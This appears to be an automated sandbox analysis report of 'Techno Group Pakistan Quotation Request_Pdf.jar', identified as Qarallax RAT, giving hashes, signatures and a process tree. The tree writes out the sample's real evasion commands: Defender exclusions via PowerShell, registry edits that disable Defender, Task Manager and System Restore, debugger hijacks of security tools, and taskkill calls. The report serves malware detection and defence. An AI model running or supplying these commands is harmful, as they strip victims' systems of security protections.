Overview

overview

10

Static

static

Techno Gro...df.jar

windows7_x64

10

Techno Gro...df.jar

windows10_x64

10

Analysis

  • max time kernel
    112s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    18-08-2020 19:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Techno Group Pakistan Quotation Request_Pdf.jar

  • Size

    403KB

  • MD5

    fc115bb8e02dd12ad2e1f5b334174288

  • SHA1

    9e41b33dc89f43e509ef4297f29934ef3a9c2945

  • SHA256

    8bcdae78528284a03c0a797472234561fd523be8a9a822f51f056cf8e72a1755

  • SHA512

    5cc026bc0eca4cf136a6614df24ed84e5cff65bb8558384d4f672db5cb0f40d9614e16c7e78873a871573f6c78951befb8020be9907ebad030e77ff6a32f47d8

Score
10/10
persistenceevasiontrojanqarallax

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

    trojanqarallax
  • Qarallax RAT support DLL 1 IoCs
  • Disables Task Manager via registry modification
    evasion
  • Disables use of System Restore points 1 TTPs
    evasion
  • Sets file execution options in registry 2 TTPs
    persistence
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 19 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 140 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 804 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs
    evasion

Processes

  • C:\Windows\system32\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\Techno Group Pakistan Quotation Request_Pdf.jar"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\system32\cmd.exe
      cmd.exe
      2⤵
        PID:1524
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:684
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1616
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:552
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1064
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:1536
      • C:\Windows\system32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:1700
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1800
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1320
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\ujTBR
        2⤵
        • Views/modifies file attributes
        PID:1176
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\ujTBR
        2⤵
        • Views/modifies file attributes
        PID:1772
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\ujTBR
        2⤵
        • Views/modifies file attributes
        PID:1812
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
        2⤵
        • Views/modifies file attributes
        PID:1836
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1648
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\system32\reg.exe
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
          3⤵
            PID:1864
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
            3⤵
              PID:752
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
            2⤵
            • Kills process with taskkill
            PID:1560
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
            2⤵
              PID:1904
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
              2⤵
                PID:1868
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                2⤵
                  PID:1940
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
                  2⤵
                    PID:2016
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                    2⤵
                      PID:1988
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
                      2⤵
                        PID:1488
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                        2⤵
                          PID:1464
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
                          2⤵
                            PID:368
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                            2⤵
                              PID:1336
                            • C:\Windows\System32\reg.exe
                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                              2⤵
                                PID:792
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                2⤵
                                  PID:1076
                                  • C:\Windows\system32\reg.exe
                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                    3⤵
                                      PID:1052
                                    • C:\Windows\system32\reg.exe
                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                      3⤵
                                        PID:1404
                                    • C:\Windows\System32\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                      2⤵
                                        PID:1652
                                      • C:\Windows\System32\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                        2⤵
                                          PID:552
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                          2⤵
                                            PID:1692
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                            2⤵
                                              PID:1744
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
                                              2⤵
                                                PID:628
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:1932
                                                • C:\Windows\System32\taskkill.exe
                                                  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
                                                  2⤵
                                                  • Kills process with taskkill
                                                  PID:2008
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                  2⤵
                                                    PID:608
                                                  • C:\Windows\System32\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:664
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                      2⤵
                                                        PID:1576
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:304
                                                        • C:\Windows\System32\reg.exe
                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                          2⤵
                                                            PID:1976
                                                          • C:\Windows\System32\reg.exe
                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:904
                                                            • C:\Windows\System32\reg.exe
                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                              2⤵
                                                                PID:576
                                                              • C:\Windows\System32\reg.exe
                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:1796
                                                                • C:\Windows\System32\reg.exe
                                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                  2⤵
                                                                    PID:1940
                                                                  • C:\Windows\System32\reg.exe
                                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                    2⤵
                                                                      PID:588
                                                                    • C:\Windows\System32\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                      2⤵
                                                                        PID:1332
                                                                      • C:\Windows\System32\reg.exe
                                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                        2⤵
                                                                          PID:1536
                                                                        • C:\Windows\System32\reg.exe
                                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                          2⤵
                                                                            PID:1812
                                                                          • C:\Windows\System32\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                            2⤵
                                                                              PID:1848
                                                                            • C:\Windows\System32\taskkill.exe
                                                                              "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:524
                                                                            • C:\Windows\System32\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                              2⤵
                                                                                PID:796
                                                                              • C:\Windows\System32\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                2⤵
                                                                                  PID:1508
                                                                                • C:\Windows\System32\taskkill.exe
                                                                                  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:1952
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd.exe
                                                                                  2⤵
                                                                                    PID:1824
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
                                                                                      3⤵
                                                                                        PID:1936
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
                                                                                        3⤵
                                                                                          PID:1568
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        cmd.exe
                                                                                        2⤵
                                                                                          PID:296
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
                                                                                            3⤵
                                                                                              PID:1492
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
                                                                                              3⤵
                                                                                                PID:792
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              cmd.exe
                                                                                              2⤵
                                                                                                PID:1396
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
                                                                                                  3⤵
                                                                                                    PID:108
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
                                                                                                    3⤵
                                                                                                      PID:308
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    cmd.exe
                                                                                                    2⤵
                                                                                                      PID:368
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
                                                                                                        3⤵
                                                                                                          PID:1524
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
                                                                                                          3⤵
                                                                                                            PID:1788
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          cmd.exe
                                                                                                          2⤵
                                                                                                            PID:2020
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
                                                                                                              3⤵
                                                                                                                PID:524
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
                                                                                                                3⤵
                                                                                                                  PID:1224
                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                                                                                                2⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:2024
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                cmd.exe
                                                                                                                2⤵
                                                                                                                  PID:1336
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:1052
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:1912
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd.exe
                                                                                                                      2⤵
                                                                                                                        PID:1488
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:112
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:1652
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            cmd.exe
                                                                                                                            2⤵
                                                                                                                              PID:2004
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:1548
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:1692
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  cmd.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:568
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
                                                                                                                                      3⤵
                                                                                                                                        PID:1844
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      cmd.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:552
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:628
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:1812
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            cmd.exe
                                                                                                                                            2⤵
                                                                                                                                              PID:1744
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:1864
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:904
                                                                                                                                                • C:\Windows\System32\taskkill.exe
                                                                                                                                                  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                                                                                                                  2⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:588
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  cmd.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:792
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2016
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:484
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        cmd.exe
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1808
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:524
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1616
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              cmd.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1052
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1912
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1404
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    cmd.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1520
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1952
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1588
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          cmd.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1652
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:664
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1992
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                cmd.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1604
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1692
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1104
                                                                                                                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                      "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:1908
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1864
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1900
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1940
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1616
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1676
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2008
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1928
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1944
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:320
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1588
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1508
                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:1056
                                                                                                                                                                                                            • C:\Windows\System32\taskkill.exe
